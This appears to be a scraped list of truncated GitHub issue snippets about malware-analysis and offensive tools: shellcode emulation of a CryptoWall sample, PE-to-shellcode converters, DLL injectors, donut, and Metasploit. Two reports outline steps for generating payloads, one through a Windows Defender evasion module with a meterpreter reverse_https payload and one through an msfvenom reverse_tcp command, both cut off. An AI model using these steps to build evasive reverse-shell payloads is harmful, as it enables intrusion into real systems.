-
```
[+] TEB addr is 0x6000
[+] PEB addr is 0x6044
[+] Loading /home/ryancor/Desktop/SandBoxMalware/cryptowall/Windows/SysWOW64/ntdll.dll to 0x10000000
[+] Done with loading /home/ryancor/Desktop/S…
```
-
**Feature Request or Bug**
Bug
**Describe the feature request or bug**
dotnet run says that submodules are not initialized when I clone the repo with the --recurse-submodules flag.
**To Reprod…
ghost updated
3 years ago
-
Hi,
I am playing with Windows shellcodes; as it requires Windows memory structures to get the TEB etc., I need to use an actual sandbox.
I am running `python ~/tools/malware/miasm/example/…
-
Your PE converter has limitations but I was able to get from https://github.com/daVinci13/Exe2shell. When testing converted with runshc to check converted PE it keeps crashing but showing
[*] Read…
-
Hi,
I am trying to figure out how to properly use the injector. Does it work with DLLs? I don't see any manual mapping or fixing of relocs etc. in injector code but I am still familiarizing myself.…
-
Hi,
I am trying to test your tool on Debian 10 with the PyAna (https://github.com/PyAna/PyAna/blob/master/Samples/UrlDownloadToFile.sc) shellcode sample UrlDownloadToFile.sc.
I get multiple errors:
- first: …
lprat updated
4 years ago
-
The OS version of Windows 2008 R2 SP1 is `6.1.7601`; donut works great from this version to the latest Windows 2019. But on a slightly older OS, it just won't run.
### Environment
* Windows 2008 R2 wi…
-
## Steps to reproduce
How'd you do it?
1. Use evasion/windows/windows_defender_exe
2. Set payload windows/meterpreter/reverse_https
3. Set listener options
4. run (generates the exe)
5. sta…
-
#### Test case
[85a6aa581ffa0514149f3267c41681d27600adbe6ca7b35ee328ec3b3d9f749c](https://www.virustotal.com/gui/file/85a6aa581ffa0514149f3267c41681d27600adbe6ca7b35ee328ec3b3d9f749c/details) - a Kr…
-
## Steps to reproduce
Metasploit 4.0.5, Alpha E
Kali Linux 4.19.0-kali4-amd64
Target VM : Windows 10
How'd you do it?
1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform window…